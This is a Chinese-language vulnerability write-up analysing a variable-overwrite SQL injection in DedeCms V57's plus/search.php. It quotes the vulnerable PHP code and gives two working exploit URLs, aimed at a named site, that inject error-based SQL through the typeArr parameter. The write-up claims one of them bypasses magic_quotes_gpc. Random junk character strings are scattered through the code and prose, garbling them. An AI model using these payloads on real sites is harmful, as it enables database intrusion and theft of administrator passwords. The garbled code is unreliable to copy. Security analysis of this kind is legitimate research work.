DedeCms V57 plus/search.php文件SQL注射

admin

微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.
3 O4 o: X# l$ b9 e- P# |作者: c4rp3nt3r@0x50sec.org
0 i$ Y8 l' [9 L. }( ^  b  yDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
* _  e! ~0 \- X& x! d6 X. Y
黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
, w# f3 P  r; N5 A0 e
============
+ w5 ?% z6 L9 a8 l
7 g$ a5 _; @2 L$ E2 C! U7 }
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.

2 [2 w% \* e0 U* P2 u! y2 r. ?require_once(dirname(__FILE__).”/../include/common.inc.php”);
require_once(DEDEINC.”/arc.searchview.class.php”);

$ S9 W6 c+ G# N1 ]; f$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
( o8 X# `7 n/ x9 A( ~3 u$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
( d: {4 U0 h( V$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;
5 Z9 f4 g( U6 \/ p- Y
if(!isset($orderby)) $orderby=”;
* l( B: o6 V0 W2 \& R: Melse $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);
, o7 e6 J& ?3 b, N

if(!isset($searchtype)) $searchtype = ‘titlekeyword’;
else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);
% j' w7 @+ w5 M/ j
# N) l6 Z) I! |if(!isset($keyword)){
    if(!isset($q)) $q = ”;
    $keyword=$q;
3 \3 }$ g! l! \3 `5 I; J. B}

3 Z# i+ `5 n* U# ~7 I  N  ?1 I( [" b$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));

/ @8 D2 b2 l1 x1 Z) |) ^* V//查找栏目信息
4 L3 _% L7 ~  X% V4 H: f9 z( ~if(empty($typeid))
{
3 S' p7 F0 |9 B9 v( I    $typenameCacheFile = DEDEDATA.’/cache/typename.inc’;
    if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
    {
4 `' L/ c4 g8 W3 O1 I7 h        $fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
        fwrite($fp, “<”.”?php\r\n”);
        $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);
9 H( f+ S5 z! t9 n+ f6 ^        $dsql->Execute();
        while($row = $dsql->GetArray())
        {
: y' K: T5 P0 i4 M) t7 t            fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);
1 @) o) t4 |- r6 Y        }
! L/ u% p( x# m4 G( a( B        fwrite($fp, ‘?’.'>’);
        fclose($fp);
    }
    //引入栏目缓存并看关键字是否有相关栏目内容
4 o* x& b' v, q: F: H/ d    require_once($typenameCacheFile);
//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个
//
    if(isset($typeArr) && is_array($typeArr))
    {
        foreach($typeArr as $id=>$typename)
( m: b" j1 x) S. K* i) ]3 d! s        {
/ ^; R. {& d! ]0 X6 [
            <font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font>  //这个地方要绕过
            if($keyword != $keywordn)
. q, y; `$ A0 X% e8 D; W  @3 B0 R            {
: ~8 j) O) I8 A" `9 A; q                $keyword = $keywordn;
& \! }3 T6 r3 u4 i                <font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设
                break;
5 ]2 d% T* z4 ^" t- T( j            }
; Y) Z1 P" N& j        }
    }
}
然后plus/search.php文件下面定义了一个 Search类的对象 .
3 R# h/ V3 n- [: G0 g% |8 Z在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.
+ ?8 E3 B+ H* q6 a. N) R$this->TypeLink = new TypeLink($typeid);
7 R3 k: @: z0 A, S8 s
TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.
0 G3 R$ S: l9 n- E
4 l2 u7 a6 F3 |0 @* E& mclass TypeLink
. }: R, ^/ g2 D  c6 M6 N{
    var $typeDir;
; ?, s; K+ ?6 H; n$ H) ^    var $dsql;
) g/ g7 O5 D0 E$ s2 _9 n7 ]    var $TypeID;
4 K. c8 Y) {5 a2 S+ g* N    var $baseDir;
    var $modDir;
    var $indexUrl;
; Q; T: V& P, `: M! Y/ d    var $indexName;
) q( [  l: a! }    var $TypeInfos;
. L7 q3 u7 U; O4 m    var $SplitSymbol;
    var $valuePosition;
    var $valuePositionName;
    var $OptionArrayList;//构造函数///////
" t* H9 S: F, W5 ~6 s1 S& {  x5 p    //php5构造函数
8 z: y+ p' E6 {' i    function __construct($typeid)
2 N  X7 X" h/ Y" a& [    {
: O1 a; k. F8 I9 q        $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];
        $this->indexName = $GLOBALS['cfg_indexname'];
        $this->baseDir = $GLOBALS['cfg_basedir'];
- d* @4 J. u  k3 b* p/ T        $this->modDir = $GLOBALS['cfg_templets_dir'];
) A& d& W7 u2 \8 X. z" L# p3 l& C        $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
+ o" F- O& F* X4 T5 |( u  I        $this->dsql = $GLOBALS['dsql'];
        $this->TypeID = $typeid;
        $this->valuePosition = ”;
& l! ]& k+ o7 D        $this->valuePositionName = ”;
+ ~, L" s+ b2 n$ R! p; ?        $this->typeDir = ”;
        $this->OptionArrayList = ”;

# t7 R4 I; \- C& \        //载入类目信息

        <font color=”Red”>$query = “SELECT tp.*,ch.typename as
: L+ [3 }$ E3 Pctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join
`#@__channeltype` ch
        on ch.id=tp.channeltype  WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿
7 f' H3 Y0 h" T: B5 T. p& d
        if($typeid > 0)
        {
            $this->TypeInfos = $this->dsql->GetOne($query);
- S9 X7 I8 c& ^) Y. h1 R利用代码一 需要 即使magic_quotes_gpc = Off
. x3 O# L0 U( ?) e4 U2 }
www.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
- q! E; x$ l2 |0 S
; Y% d0 i* r( Z6 q* R( _这只是其中一个利用代码… Search 类的构造函数再往下
4 G2 E, {( X, i0 V6 N
……省略
$this->TypeID = $typeid;
……省略
if($this->TypeID==”0″){
7 p" `3 g! u2 l( q6 B) ?5 g* {            $this->ChannelTypeid=1;
        }else{
$ H: z9 r/ U9 D. o. x            $row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
//现在不鸡肋了吧亲…
8 e& q' ^- q- d  V            $this->ChannelTypeid=$row['channeltype'];

        }
利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.

. s0 U1 w" A0 i1 |: r8 }* p" Zwww.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title

  t8 B# U# P- j: R+ e' ]: k6 f% ^如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站
4 f3 ~+ C& `2 w